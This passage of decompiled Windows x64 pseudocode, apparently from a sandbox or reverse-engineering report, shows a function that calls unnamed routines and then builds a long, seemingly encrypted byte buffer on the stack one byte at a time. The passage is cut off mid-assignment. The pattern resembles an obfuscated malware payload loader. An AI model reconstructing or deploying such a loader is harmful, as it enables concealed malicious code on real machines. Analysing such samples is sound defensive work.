                                                                                                      				char _v2226;
                                                                                                      				char _v2227;
                                                                                                      				char _v2228;
                                                                                                      				char _v2229;
                                                                                                      				char _v2230;
                                                                                                      				char _v2231;
                                                                                                      				char _v2232;
                                                                                                      				char _v2233;
                                                                                                      				char _v2234;
                                                                                                      				char _v2235;
                                                                                                      				char _v2236;
                                                                                                      				char _v2237;
                                                                                                      				char _v2238;
                                                                                                      				char _v2239;
                                                                                                      				char _v2240;
                                                                                                      				char _v2241;
                                                                                                      				char _v2242;
                                                                                                      				char _v2243;
                                                                                                      				char _v2244;
                                                                                                      				char _v2245;
                                                                                                      				char _v2246;
                                                                                                      				char _v2247;
                                                                                                      				char _v2248;
                                                                                                      				char _v2249;
                                                                                                      				char _v2250;
                                                                                                      				char _v2251;
                                                                                                      				char _v2252;
                                                                                                      				char _v2253;
                                                                                                      				char _v2254;
                                                                                                      				char _v2255;
                                                                                                      				char _v2256;
                                                                                                      				char _v2257;
                                                                                                      				char _v2258;
                                                                                                      				char _v2259;
                                                                                                      				char _v2260;
                                                                                                      				char _v2261;
                                                                                                      				char _v2262;
                                                                                                      				char _v2263;
                                                                                                      				char _v2264;
                                                                                                      				char _v2265;
                                                                                                      				char _v2266;
                                                                                                      				char _v2267;
                                                                                                      				char _v2268;
                                                                                                      				char _v2269;
                                                                                                      				char _v2270;
                                                                                                      				char _v2271;
                                                                                                      				char _v2272;
                                                                                                      				char _v2273;
                                                                                                      				char _v2274;
                                                                                                      				char _v2275;
                                                                                                      				char _v2276;
                                                                                                      				char _v2277;
                                                                                                      				char _v2278;
                                                                                                      				char _v2279;
                                                                                                      				char _v2280;
                                                                                                      				char _v2281;
                                                                                                      				char _v2282;
                                                                                                      				char _v2283;
                                                                                                      				char _v2284;
                                                                                                      				char _v2285;
                                                                                                      				char _v2286;
                                                                                                      				char _v2287;
                                                                                                      				char _v2288;
                                                                                                      				char _v2289;
                                                                                                      				char _v2290;
                                                                                                      				char _v2291;
                                                                                                      				char _v2292;
                                                                                                      				char _v2293;
                                                                                                      				char _v2294;
                                                                                                      				char _v2295;
                                                                                                      				char _v2296;
                                                                                                      				char _v2297;
                                                                                                      				char _v2298;
                                                                                                      				char _v2299;
                                                                                                      				char _v2300;
                                                                                                      				char _v2301;
                                                                                                      				char _v2302;
                                                                                                      				char _v2303;
                                                                                                      				char _v2304;
                                                                                                      				char _v2305;
                                                                                                      				char _v2306;
                                                                                                      				char _v2307;
                                                                                                      				char _v2308;
                                                                                                      				char _v2309;
                                                                                                      				char _v2310;
                                                                                                      				char _v2311;
                                                                                                      				char _v2312;
                                                                                                      				char _v2313;
                                                                                                      				char _v2314;
                                                                                                      				char _v2315;
                                                                                                      				char _v2316;
                                                                                                      				char _v2317;
                                                                                                      				char _v2318;
                                                                                                      				char _v2319;
                                                                                                      				char _v2320;
                                                                                                      				char _v2321;
                                                                                                      				char _v2322;
                                                                                                      				char _v2323;
                                                                                                      				char _v2324;
                                                                                                      				char _v2325;
                                                                                                      				char _v2326;
                                                                                                      				char _v2327;
                                                                                                      				char _v2328;
                                                                                                      				char _v2329;
                                                                                                      				char _v2330;
                                                                                                      				char _v2331;
                                                                                                      				char _v2332;
                                                                                                      				char _v2333;
                                                                                                      				char _v2334;
                                                                                                      				char _v2335;
                                                                                                      				char _v2336;
                                                                                                      				char _v2337;
                                                                                                      				char _v2338;
                                                                                                      				char _v2339;
                                                                                                      				char _v2340;
                                                                                                      				char _v2341;
                                                                                                      				char _v2342;
                                                                                                      				char _v2343;
                                                                                                      				char _v2344;
                                                                                                      				char _v2345;
                                                                                                      				char _v2346;
                                                                                                      				char _v2347;
                                                                                                      				char _v2348;
                                                                                                      				char _v2349;
                                                                                                      				char _v2350;
                                                                                                      				char _v2351;
                                                                                                      				char _v2352;
                                                                                                      				char _v2353;
                                                                                                      				char _v2354;
                                                                                                      				char _v2355;
                                                                                                      				char _v2356;
                                                                                                      				char _v2357;
                                                                                                      				char _v2358;
                                                                                                      				char _v2359;
                                                                                                      				char _v2360;
                                                                                                      				char _v2361;
                                                                                                      				char _v2362;
                                                                                                      				char _v2363;
                                                                                                      				char _v2364;
                                                                                                      				char _v2365;
                                                                                                      				char _v2366;
                                                                                                      				char _v2367;
                                                                                                      				char _v2368;
                                                                                                      				char _v2369;
                                                                                                      				char _v2370;
                                                                                                      				char _v2371;
                                                                                                      				char _v2372;
                                                                                                      				char _v2373;
                                                                                                      				char _v2374;
                                                                                                      				char _v2375;
                                                                                                      				char _v2376;
                                                                                                      				char _v2377;
                                                                                                      				char _v2378;
                                                                                                      				char _v2379;
                                                                                                      				char _v2380;
                                                                                                      				char _v2381;
                                                                                                      				char _v2382;
                                                                                                      				char _v2383;
                                                                                                      				char _v2384;
                                                                                                      				char _v2385;
                                                                                                      				char _v2386;
                                                                                                      				char _v2387;
                                                                                                      				char _v2388;
                                                                                                      				char _v2389;
                                                                                                      				char _v2390;
                                                                                                      				char _v2391;
                                                                                                      				char _v2392;
                                                                                                      				char _v2393;
                                                                                                      				char _v2394;
                                                                                                      				char _v2395;
                                                                                                      				char _v2396;
                                                                                                      				char _v2397;
                                                                                                      				char _v2398;
                                                                                                      				char _v2399;
                                                                                                      				char _v2400;
                                                                                                      				char _v2401;
                                                                                                      				char _v2402;
                                                                                                      				char _v2403;
                                                                                                      				char _v2404;
                                                                                                      				char _v2405;
                                                                                                      				char _v2406;
                                                                                                      				char _v2407;
                                                                                                      				char _v2408;
                                                                                                      				char _v2409;
                                                                                                      				char _v2410;
                                                                                                      				char _v2411;
                                                                                                      				char _v2412;
                                                                                                      				char _v2413;
                                                                                                      				char _v2414;
                                                                                                      				char _v2415;
                                                                                                      				char _v2416;
                                                                                                      				char _v2417;
                                                                                                      				char _v2418;
                                                                                                      				char _v2419;
                                                                                                      				char _v2420;
                                                                                                      				char _v2421;
                                                                                                      				char _v2422;
                                                                                                      				char _v2423;
                                                                                                      				char _v2424;
                                                                                                      				char _v2425;
                                                                                                      				char _v2426;
                                                                                                      				char _v2427;
                                                                                                      				char _v2428;
                                                                                                      				char _v2429;
                                                                                                      				char _v2430;
                                                                                                      				char _v2431;
                                                                                                      				char _v2432;
                                                                                                      				char _v2433;
                                                                                                      				char _v2434;
                                                                                                      				char _v2435;
                                                                                                      				char _v2436;
                                                                                                      				char _v2437;
                                                                                                      				char _v2438;
                                                                                                      				char _v2439;
                                                                                                      				char _v2440;
                                                                                                      				char _v2441;
                                                                                                      				char _v2442;
                                                                                                      				char _v2443;
                                                                                                      				char _v2444;
                                                                                                      				char _v2445;
                                                                                                      				char _v2446;
                                                                                                      				char _v2447;
                                                                                                      				char _v2448;
                                                                                                      				char _v2449;
                                                                                                      				char _v2450;
                                                                                                      				char _v2451;
                                                                                                      				char _v2452;
                                                                                                      				char _v2453;
                                                                                                      				char _v2454;
                                                                                                      				char _v2455;
                                                                                                      				char _v2456;
                                                                                                      				char _v2457;
                                                                                                      				char _v2458;
                                                                                                      				char _v2459;
                                                                                                      				char _v2460;
                                                                                                      				char _v2461;
                                                                                                      				char _v2462;
                                                                                                      				char _v2463;
                                                                                                      				char _v2464;
                                                                                                      				char _v2465;
                                                                                                      				char _v2466;
                                                                                                      				char _v2467;
                                                                                                      				char _v2468;
                                                                                                      				char _v2469;
                                                                                                      				char _v2470;
                                                                                                      				char _v2471;
                                                                                                      				char _v2472;
                                                                                                      				char _v2473;
                                                                                                      				char _v2474;
                                                                                                      				char _v2475;
                                                                                                      				char _v2476;
                                                                                                      				char _v2477;
                                                                                                      				char _v2478;
                                                                                                      				char _v2479;
                                                                                                      				char _v2480;
                                                                                                      				char _v2481;
                                                                                                      				char _v2482;
                                                                                                      				char _v2483;
                                                                                                      				char _v2484;
                                                                                                      				char _v2485;
                                                                                                      				char _v2486;
                                                                                                      				char _v2487;
                                                                                                      				char _v2488;
                                                                                                      				char _v2489;
                                                                                                      				char _v2490;
                                                                                                      				char _v2491;
                                                                                                      				char _v2492;
                                                                                                      				char _v2493;
                                                                                                      				char _v2494;
                                                                                                      				char _v2495;
                                                                                                      				char _v2496;
                                                                                                      				char _v2497;
                                                                                                      				char _v2498;
                                                                                                      				char _v2499;
                                                                                                      				char _v2500;
                                                                                                      				char _v2501;
                                                                                                      				char _v2502;
                                                                                                      				char _v2503;
                                                                                                      				char _v2504;
                                                                                                      				char _v2505;
                                                                                                      				char _v2506;
                                                                                                      				char _v2507;
                                                                                                      				char _v2508;
                                                                                                      				char _v2509;
                                                                                                      				char _v2510;
                                                                                                      				char _v2511;
                                                                                                      				char _v2512;
                                                                                                      				char _v2513;
                                                                                                      				char _v2514;
                                                                                                      				char _v2515;
                                                                                                      				char _v2516;
                                                                                                      				char _v2517;
                                                                                                      				char _v2518;
                                                                                                      				char _v2519;
                                                                                                      				char _v2520;
                                                                                                      				char _v2521;
                                                                                                      				char _v2522;
                                                                                                      				char _v2523;
                                                                                                      				char _v2524;
                                                                                                      				char _v2525;
                                                                                                      				char _v2526;
                                                                                                      				char _v2527;
                                                                                                      				char _v2528;
                                                                                                      				char _v2529;
                                                                                                      				char _v2530;
                                                                                                      				char _v2531;
                                                                                                      				char _v2532;
                                                                                                      				char _v2533;
                                                                                                      				char _v2534;
                                                                                                      				char _v2535;
                                                                                                      				char _v2536;
                                                                                                      				char _v2537;
                                                                                                      				char _v2538;
                                                                                                      				char _v2539;
                                                                                                      				char _v2540;
                                                                                                      				char _v2541;
                                                                                                      				char _v2542;
                                                                                                      				char _v2543;
                                                                                                      				char _v2544;
                                                                                                      				char _v2545;
                                                                                                      				char _v2546;
                                                                                                      				char _v2547;
                                                                                                      				char _v2548;
                                                                                                      				char _v2549;
                                                                                                      				char _v2550;
                                                                                                      				char _v2551;
                                                                                                      				char _v2552;
                                                                                                      				char _v2553;
                                                                                                      				char _v2554;
                                                                                                      				char _v2555;
                                                                                                      				char _v2556;
                                                                                                      				char _v2557;
                                                                                                      				char _v2558;
                                                                                                      				char _v2559;
                                                                                                      				char _v2560;
                                                                                                      				char _v2561;
                                                                                                      				char _v2562;
                                                                                                      				char _v2563;
                                                                                                      				char _v2564;
                                                                                                      				char _v2565;
                                                                                                      				char _v2566;
                                                                                                      				char _v2567;
                                                                                                      				char _v2568;
                                                                                                      				char _v2569;
                                                                                                      				char _v2570;
                                                                                                      				char _v2571;
                                                                                                      				char _v2572;
                                                                                                      				char _v2573;
                                                                                                      				char _v2574;
                                                                                                      				char _v2575;
                                                                                                      				char _v2576;
                                                                                                      				char _v2577;
                                                                                                      				char _v2578;
                                                                                                      				char _v2579;
                                                                                                      				char _v2580;
                                                                                                      				char _v2581;
                                                                                                      				char _v2582;
                                                                                                      				char _v2583;
                                                                                                      				char _v2584;
                                                                                                      				char _v2585;
                                                                                                      				char _v2586;
                                                                                                      				char _v2587;
                                                                                                      				char _v2588;
                                                                                                      				char _v2589;
                                                                                                      				char _v2590;
                                                                                                      				char _v2591;
                                                                                                      				char _v2592;
                                                                                                      				char _v2593;
                                                                                                      				char _v2594;
                                                                                                      				char _v2595;
                                                                                                      				char _v2596;
                                                                                                      				char _v2597;
                                                                                                      				char _v2598;
                                                                                                      				char _v2599;
                                                                                                      				char _v2600;
                                                                                                      				char _v2601;
                                                                                                      				char _v2602;
                                                                                                      				char _v2603;
                                                                                                      				char _v2604;
                                                                                                      				char _v2605;
                                                                                                      				char _v2606;
                                                                                                      				char _v2607;
                                                                                                      				char _v2608;
                                                                                                      				char _v2609;
                                                                                                      				char _v2610;
                                                                                                      				char _v2611;
                                                                                                      				char _v2612;
                                                                                                      				char _v2613;
                                                                                                      				char _v2614;
                                                                                                      				char _v2615;
                                                                                                      				char _v2616;
                                                                                                      				char _v2617;
                                                                                                      				char _v2618;
                                                                                                      				char _v2619;
                                                                                                      				char _v2620;
                                                                                                      				char _v2621;
                                                                                                      				char _v2622;
                                                                                                      				char _v2623;
                                                                                                      				char _v2624;
                                                                                                      				char _v2625;
                                                                                                      				char _v2626;
                                                                                                      				char _v2627;
                                                                                                      				char _v2628;
                                                                                                      				char _v2629;
                                                                                                      				char _v2630;
                                                                                                      				char _v2631;
                                                                                                      				char _v2632;
                                                                                                      				char _v2672;
                                                                                                      				char _v2704;
                                                                                                      				void* _v2736;
                                                                                                      				char _v2752;
                                                                                                      				signed long long _v2760;
                                                                                                      				long long _v2768;
                                                                                                      				char _v2776;
                                                                                                      				signed int _v2780;
                                                                                                      				intOrPtr _v2784;
                                                                                                      				signed long long _v2792;
                                                                                                      				signed char _v2796;
                                                                                                      				signed char _v2800;
                                                                                                      				signed char _v2804;
                                                                                                      				signed char _v2808;
                                                                                                      				signed int _t2669;
                                                                                                      				signed long long _t2714;
                                                                                                      				signed long long _t2715;
                                                                                                      				long long _t2716;
                                                                                                      				signed long long _t2748;
                                                                                                      
                                                                                                      				_t2746 = __rdi;
                                                                                                      				_t2703 = __edi;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __edx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_t2714 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				_t2715 = _t2714 ^ _t2748;
                                                                                                      				_v24 = _t2715;
                                                                                                      				_v2784 = _a16;
                                                                                                      				if (_v2784 == 1) goto 0x7c113fee;
                                                                                                      				goto 0x7c1193e5;
                                                                                                      				_v2796 = 0;
                                                                                                      				_v2800 = 0;
                                                                                                      				_v2768 = 0;
                                                                                                      				_v2792 = 0;
                                                                                                      				E00007FF87FF87C1097DC(_a16, __rcx); // executed
                                                                                                      				_v2792 = _t2715;
                                                                                                      				if (_v2792 == 0) goto 0x7c114039;
                                                                                                      				r8d = 0x5f5e100;
                                                                                                      				E00007FF87FF87C106920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
                                                                                                      				E00007FF87FF87C1093A8(_t2715, __rbx, _v2792, __rsi); // executed
                                                                                                      				 *0x7c17ea20 = 0;
                                                                                                      				 *0x7c17ea14 = 0;
                                                                                                      				 *0x7c17ea24 = 0;
                                                                                                      				 *0x7c17ea18 = 0;
                                                                                                      				 *0x7c17ea1c = 0;
                                                                                                      				 *0x7c17ea10 = 0;
                                                                                                      				_v2632 = 0x62;
                                                                                                      				_v2631 = 0xfa;
                                                                                                      				_v2630 = 0x28;
                                                                                                      				_v2629 = 0x18;
                                                                                                      				_v2628 = 0x56;
                                                                                                      				_v2627 = 0x18;
                                                                                                      				_v2626 = 0x3d;
                                                                                                      				_v2625 = 0x31;
                                                                                                      				_v2624 = 0x39;
                                                                                                      				_v2623 = 0x13;
                                                                                                      				_v2622 = 0x33;
                                                                                                      				_v2621 = 9;
                                                                                                      				_v2620 = 5;
                                                                                                      				_v2619 = 0x64;
                                                                                                      				_v2618 = 0x18;
                                                                                                      				_v2617 = 0x2d;
                                                                                                      				_v2616 = 0x39;
                                                                                                      				_v2615 = 0x32;
                                                                                                      				_v2614 = 0xae;
                                                                                                      				_v2613 = 0x33;
                                                                                                      				_v2612 = 2;
                                                                                                      				_v2611 = 0xdc;
                                                                                                      				_v2610 = 0xf;
                                                                                                      				_v2609 = 0xd9;
                                                                                                      				_v2608 = 0x8a;
                                                                                                      				_v2607 = 0x2c;
                                                                                                      				_v2606 = 0x45;
                                                                                                      				_v2605 = 0x26;
                                                                                                      				_v2604 = 0x3c;
                                                                                                      				_v2603 = 0x60;
                                                                                                      				_v2602 = 0x69;
                                                                                                      				_v2601 = 0xdb;
                                                                                                      				_v2600 = 0x9e;
                                                                                                      				_v2599 = 0x2e;
                                                                                                      				_v2598 = 0xd5;
                                                                                                      				_v2597 = 0x26;
                                                                                                      				_v2596 = 0x26;
                                                                                                      				_v2595 = 0x30;
                                                                                                      				_v2594 = 0x3f;
                                                                                                      				_v2593 = 0x22;
                                                                                                      				_v2592 = 0xe6;
                                                                                                      				_v2591 = 0xce;
                                                                                                      				_v2590 = 0x3c;
                                                                                                      				_v2589 = 0xe6;
                                                                                                      				_v2588 = 0x4c;
                                                                                                      				_v2587 = 0xd5;
                                                                                                      				_v2586 = 0xb9;
                                                                                                      				_v2585 = 0x39;
                                                                                                      				_v2584 = 0xef;
                                                                                                      				_v2583 = 0xdb;
                                                                                                      				_v2582 = 0x81;
                                                                                                      				_v2581 = 0x12;
                                                                                                      				_v2580 = 0xc4;
                                                                                                      				_v2579 = 0xb;
                                                                                                      				_v2578 = 0xd7;
                                                                                                      				_v2577 = 0x22;
                                                                                                      				_v2576 = 0xdb;
                                                                                                      				_v2575 = 2;
                                                                                                      				_v2574 = 0xb8;
                                                                                                      				_v2573 = 0x15;
                                                                                                      				_v2572 = 0xa8;
                                                                                                      				_v2571 = 2;
                                                                                                      				_v2570 = 0x48;
                                                                                                      				_v2569 = 0xb;
                                                                                                      				_v2568 = 0x36;
                                                                                                      				_v2567 = 0xaa;
                                                                                                      				_v2566 = 0x3a;
                                                                                                      				_v2565 = 0xde;
                                                                                                      				_v2564 = 0x30;
                                                                                                      				_v2563 = 0xcf;
                                                                                                      				_v2562 = 0x15;
                                                                                                      				_v2561 = 0xca;
                                                                                                      				_v2560 = 0x30;
                                                                                                      				_v2559 = 0xcc;
                                                                                                      				_v2558 = 0x6b;
                                                                                                      				_v2557 = 0xae;
                                                                                                      				_v2556 = 0x69;
                                                                                                      				_v2555 = 0xd3;
                                                                                                      				_v2554 = 0x5a;
                                                                                                      				_v2553 = 0xb1;
                                                                                                      				_v2552 = 0x27;
                                                                                                      				_v2551 = 0xe4;
                                                                                                      				_v2550 = 0x28;
                                                                                                      				_v2549 = 0xf6;
                                                                                                      				_v2548 = 0x19;
                                                                                                      				_v2547 = 0xb6;
                                                                                                      				_v2546 = 0xf;
                                                                                                      				_v2545 = 0x65;
                                                                                                      				_v2544 = 0x7b;
                                                                                                      				_v2543 = 0xf9;
                                                                                                      				_v2542 = 0xa;
                                                                                                      				_v2541 = 0x3d;
                                                                                                      				_v2540 = 0x71;
                                                                                                      				_v2539 = 0x89;
                                                                                                      				_v2538 = 0x4e;
                                                                                                      				_v2537 = 0x57;
                                                                                                      				_v2536 = 0x40;
                                                                                                      				_v2535 = 0xfb;
                                                                                                      				_v2534 = 0x1b;
                                                                                                      				_v2533 = 0xf1;
                                                                                                      				_v2532 = 0x1c;
                                                                                                      				_v2531 = 0x67;
                                                                                                      				_v2530 = 0;
                                                                                                      				_v2529 = 0x52;
                                                                                                      				_v2528 = 0xa0;
                                                                                                      				_v2527 = 0xd;
                                                                                                      				_v2526 = 0x90;
                                                                                                      				_v2525 = 0x40;
                                                                                                      				_v2524 = 0x4e;
                                                                                                      				_v2523 = 0;
                                                                                                      				_v2522 = 0x6e;
                                                                                                      				_v2521 = 0xbd;
                                                                                                      				_v2520 = 0x66;
                                                                                                      				_v2519 = 0x9b;
                                                                                                      				_v2518 = 0x15;
                                                                                                      				_v2517 = 0x74;
                                                                                                      				_v2516 = 0x75;
                                                                                                      				_v2515 = 0x58;
                                                                                                      				_v2514 = 0xa1;
                                                                                                      				_v2513 = 0x31;
                                                                                                      				_v2512 = 0x8c;
                                                                                                      				_v2511 = 8;
                                                                                                      				_v2510 = 0x3c;
                                                                                                      				_v2509 = 0x41;
                                                                                                      				_v2508 = 0x5a;
                                                                                                      				_v2507 = 0xf8;
                                                                                                      				_v2506 = 0x1c;
                                                                                                      				_v2505 = 0xa7;
                                                                                                      				_v2504 = 1;
                                                                                                      				_v2503 = 0x4d;
                                                                                                      				_v2502 = 0x4a;
                                                                                                      				_v2501 = 0x55;
                                                                                                      				_v2500 = 0xf8;
                                                                                                      				_v2499 = 0xef;
                                                                                                      				_v2498 = 0xd5;
                                                                                                      				_v2497 = 0x3f;
                                                                                                      				_v2496 = 0x70;
                                                                                                      				_v2495 = 0x6f;
                                                                                                      				_v2494 = 0x7a;
                                                                                                      				_v2493 = 0x59;
                                                                                                      				_v2492 = 0x65;
                                                                                                      				_v2491 = 0x4f;
                                                                                                      				_v2490 = 0xb5;
                                                                                                      				_v2489 = 0xe1;
                                                                                                      				_v2488 = 0x80;
                                                                                                      				_v2487 = 0x5e;
                                                                                                      				_v2486 = 0x4d;
                                                                                                      				_v2485 = 0x6e;
                                                                                                      				_v2484 = 0x17;
                                                                                                      				_v2483 = 0xa9;
                                                                                                      				_v2482 = 0x16;
                                                                                                      				_v2481 = 0x43;
                                                                                                      				_v2480 = 0;
                                                                                                      				_v2479 = 0x1c;
                                                                                                      				_v2478 = 0x4a;
                                                                                                      				_v2477 = 0x2f;
                                                                                                      				_v2476 = 8;
                                                                                                      				_v2475 = 0xa9;
                                                                                                      				_v2474 = 0x3e;
                                                                                                      				_v2473 = 7;
                                                                                                      				_v2472 = 0x13;
                                                                                                      				_v2471 = 0x6a;
                                                                                                      				_v2470 = 0x1d;
                                                                                                      				_v2469 = 0x25;
                                                                                                      				_v2468 = 0x2a;
                                                                                                      				_v2467 = 0xa1;
                                                                                                      				_v2466 = 0x30;
                                                                                                      				_v2465 = 0x60;
                                                                                                      				_v2464 = 0x76;
                                                                                                      				_v2463 = 0x5d;
                                                                                                      				_v2462 = 0x57;
                                                                                                      				_v2461 = 0x23;
                                                                                                      				_v2460 = 0x7e;
                                                                                                      				_v2459 = 0x9e;
                                                                                                      				_v2458 = 0x2f;
                                                                                                      				_v2457 = 0x49;
                                                                                                      				_v2456 = 0x75;
                                                                                                      				_v2455 = 0x70;
                                                                                                      				_v2454 = 0x3c;
                                                                                                      				_v2453 = 0x4d;
                                                                                                      				_v2452 = 0x1e;
                                                                                                      				_v2451 = 0xaa;
                                                                                                      				_v2450 = 0x7b;
                                                                                                      				_v2449 = 0x54;
                                                                                                      				_v2448 = 0x53;
                                                                                                      				_v2447 = 0x5c;
                                                                                                      				_v2446 = 0x54;
                                                                                                      				_v2445 = 0x6c;
                                                                                                      				_v2444 = 0x6b;
                                                                                                      				_v2443 = 0xb4;
                                                                                                      				_v2442 = 0x20;
                                                                                                      				_v2441 = 0x18;
                                                                                                      				_v2440 = 0x1e;
                                                                                                      				_v2439 = 0x21;
                                                                                                      				_v2438 = 2;
                                                                                                      				_v2437 = 8;
                                                                                                      				_v2436 = 0xd;
                                                                                                      				_v2435 = 0x95;
                                                                                                      				_v2434 = 0x23;
                                                                                                      				_v2433 = 0x6c;
                                                                                                      				_v2432 = 8;
                                                                                                      				_v2431 = 0x73;
                                                                                                      				_v2430 = 0x27;
                                                                                                      				_v2429 = 0x1e;
                                                                                                      				_v2428 = 0x1a;
                                                                                                      				_v2427 = 0xbd;
                                                                                                      				_v2426 = 0x67;
                                                                                                      				_v2425 = 0x7b;
                                                                                                      				_v2424 = 0x7a;
                                                                                                      				_v2423 = 1;
                                                                                                      				_v2422 = 0x26;
                                                                                                      				_v2421 = 0x34;
                                                                                                      				_v2420 = 0x36;
                                                                                                      				_v2419 = 0xb3;
                                                                                                      				_v2418 = 0;
                                                                                                      				_v2417 = 2;
                                                                                                      				_v2416 = 0x5c;
                                                                                                      				_v2415 = 0x57;
                                                                                                      				_v2414 = 0x35;
                                                                                                      				_v2413 = 0x4b;
                                                                                                      				_v2412 = 0x3c;
                                                                                                      				_v2411 = 0xd;
                                                                                                      				_v2410 = 0xaa;
                                                                                                      				_v2409 = 9;
                                                                                                      				_v2408 = 2;
                                                                                                      				_v2407 = 0x31;
                                                                                                      				_v2406 = 0x5c;
                                                                                                      				_v2405 = 0x1e;
                                                                                                      				_v2404 = 0xaa;
                                                                                                      				_v2403 = 0x7a;
                                                                                                      				_v2402 = 0xe8;
                                                                                                      				_v2401 = 0x29;
                                                                                                      				_v2400 = 0x45;
                                                                                                      				_v2399 = 0x40;
                                                                                                      				_v2398 = 0x73;
                                                                                                      				_v2397 = 0xed;
                                                                                                      				_v2396 = 0x36;
                                                                                                      				_v2395 = 0xf8;
                                                                                                      				_v2394 = 0x54;
                                                                                                      				_v2393 = 0x17;
                                                                                                      				_v2392 = 0x23;
                                                                                                      				_v2391 = 0x1d;
                                                                                                      				_v2390 = 0xa0;
                                                                                                      				_v2389 = 0x2b;
                                                                                                      				_v2388 = 0xf2;
                                                                                                      				_v2387 = 0x13;
                                                                                                      				_v2386 = 0x3a;
                                                                                                      				_v2385 = 0x25;
                                                                                                      				_v2384 = 0x46;
                                                                                                      				_v2383 = 0x89;
                                                                                                      				_v2382 = 0x29;
                                                                                                      				_v2381 = 0xca;
                                                                                                      				_v2380 = 0xe;
                                                                                                      				_v2379 = 0x4a;
                                                                                                      				_v2378 = 0x30;
                                                                                                      				_v2377 = 0x48;
                                                                                                      				_v2376 = 0xb3;
                                                                                                      				_v2375 = 2;
                                                                                                      				_v2374 = 0xf0;
                                                                                                      				_v2373 = 0x25;
                                                                                                      				_v2372 = 0x15;
                                                                                                      				_v2371 = 0x27;
                                                                                                      				_v2370 = 0x4e;
                                                                                                      				_v2369 = 0xfb;
                                                                                                      				_v2368 = 0x61;
                                                                                                      				_v2367 = 0x7e;
                                                                                                      				_v2366 = 0x57;
                                                                                                      				_v2365 = 0x1e;
                                                                                                      				_v2364 = 0xe;
                                                                                                      				_v2363 = 0x19;
                                                                                                      				_v2362 = 3;
                                                                                                      				_v2361 = 0xe1;
                                                                                                      				_v2360 = 0x11;
                                                                                                      				_v2359 = 0x1b;
                                                                                                      				_v2358 = 6;
                                                                                                      				_v2357 = 0xc;
                                                                                                      				_v2356 = 0x4b;
                                                                                                      				_v2355 = 0x19;
                                                                                                      				_v2354 = 0x19;
                                                                                                      				_v2353 = 0xee;
                                                                                                      				_v2352 = 0x71;
                                                                                                      				_v2351 = 0x24;
                                                                                                      				_v2350 = 0x5a;
                                                                                                      				_v2349 = 0x16;
                                                                                                      				_v2348 = 0x37;
                                                                                                      				_v2347 = 0x45;
                                                                                                      				_v2346 = 0x2d;
                                                                                                      				_v2345 = 0x8a;
                                                                                                      				_v2344 = 0x2a;
                                                                                                      				_v2343 = 0x43;
                                                                                                      				_v2342 = 0x1a;
                                                                                                      				_v2341 = 0x26;
                                                                                                      				_v2340 = 2;
                                                                                                      				_v2339 = 0x25;
                                                                                                      				_v2338 = 0x19;
                                                                                                      				_v2337 = 0x43;
                                                                                                      				_v2336 = 0x89;
                                                                                                      				_v2335 = 0x28;
                                                                                                      				_v2334 = 0x4a;
                                                                                                      				_v2333 = 2;
                                                                                                      				_v2332 = 0x4d;
                                                                                                      				_v2331 = 0x39;
                                                                                                      				_v2330 = 0xe0;
                                                                                                      				_v2329 = 0x30;
                                                                                                      				_v2328 = 0x63;
                                                                                                      				_v2327 = 0x22;
                                                                                                      				_v2326 = 9;
                                                                                                      				_v2325 = 0xb3;
                                                                                                      				_v2324 = 1;
                                                                                                      				_v2323 = 0xa6;
                                                                                                      				_v2322 = 0x6e;
                                                                                                      				_v2321 = 0x51;
                                                                                                      				_v2320 = 0x36;
                                                                                                      				_v2319 = 0x7e;
                                                                                                      				_v2318 = 0x9e;
                                                                                                      				_v2317 = 0x2e;
                                                                                                      				_v2316 = 0xe9;
                                                                                                      				_v2315 = 0x29;
                                                                                                      				_v2314 = 0x42;
                                                                                                      				_v2313 = 0x13;
                                                                                                      				_v2312 = 0x4a;
                                                                                                      				_v2311 = 0xad;
                                                                                                      				_v2310 = 0x28;
                                                                                                      				_v2309 = 0xb7;
                                                                                                      				_v2308 = 0x1e;
                                                                                                      				_v2307 = 0xc;
                                                                                                      				_v2306 = 0x5d;
                                                                                                      				_v2305 = 0x5c;
                                                                                                      				_v2304 = 0xc7;
                                                                                                      				_v2303 = 0x6f;
                                                                                                      				_v2302 = 0xff;
                                                                                                      				_v2301 = 0xb;
                                                                                                      				_v2300 = 0x52;
                                                                                                      				_v2299 = 0xa;
                                                                                                      				_v2298 = 0x2c;
                                                                                                      				_v2297 = 8;
                                                                                                      				_v2296 = 0xa0;
                                                                                                      				_v2295 = 0x2b;
                                                                                                      				_v2294 = 0xc2;
                                                                                                      				_v2293 = 5;
                                                                                                      				_v2292 = 0x24;
                                                                                                      				_v2291 = 0xb8;
                                                                                                      				_v2290 = 0xe7;
                                                                                                      				_v2289 = 0x49;
                                                                                                      				_v2288 = 0x6c;
                                                                                                      				_v2287 = 0x6e;
                                                                                                      				_v2286 = 0xc3;
                                                                                                      				_v2285 = 0x96;
                                                                                                      				_v2284 = 0x1e;
                                                                                                      				_v2283 = 0xff;
                                                                                                      				_v2282 = 0x2a;
                                                                                                      				_v2281 = 0xf;
                                                                                                      				_v2280 = 0xd3;
                                                                                                      				_v2279 = 0xbe;
                                                                                                      				_v2278 = 0x9c;
                                                                                                      				_v2277 = 0xf1;
                                                                                                      				_v2276 = 0x21;
                                                                                                      				_v2275 = 0x3c;
                                                                                                      				_v2274 = 0x25;
                                                                                                      				_v2273 = 0x16;
                                                                                                      				_v2272 = 0xb4;
                                                                                                      				_v2271 = 0xb1;
                                                                                                      				_v2270 = 0x23;
                                                                                                      				_v2269 = 0xe4;
                                                                                                      				_v2268 = 8;
                                                                                                      				_v2267 = 0xfe;
                                                                                                      				_v2266 = 0x1d;
                                                                                                      				_v2265 = 0xb2;
                                                                                                      				_v2264 = 0x2f;
                                                                                                      				_v2263 = 0xd5;
                                                                                                      				_v2262 = 0xf8;
                                                                                                      				_v2261 = 0x35;
                                                                                                      				_v2260 = 0x7f;
                                                                                                      				_v2259 = 0x31;
                                                                                                      				_v2258 = 0x35;
                                                                                                      				_v2257 = 0x18;
                                                                                                      				_v2256 = 0x2a;
                                                                                                      				_v2255 = 0x3f;
                                                                                                      				_v2254 = 0xe9;
                                                                                                      				_v2253 = 0x70;
                                                                                                      				_v2252 = 0x7a;
                                                                                                      				_v2251 = 0x7d;
                                                                                                      				_v2250 = 0x26;
                                                                                                      				_v2249 = 0xee;
                                                                                                      				_v2248 = 0x2b;
                                                                                                      				_v2247 = 0x4a;
                                                                                                      				_v2246 = 0x2b;
                                                                                                      				_v2245 = 0xc5;
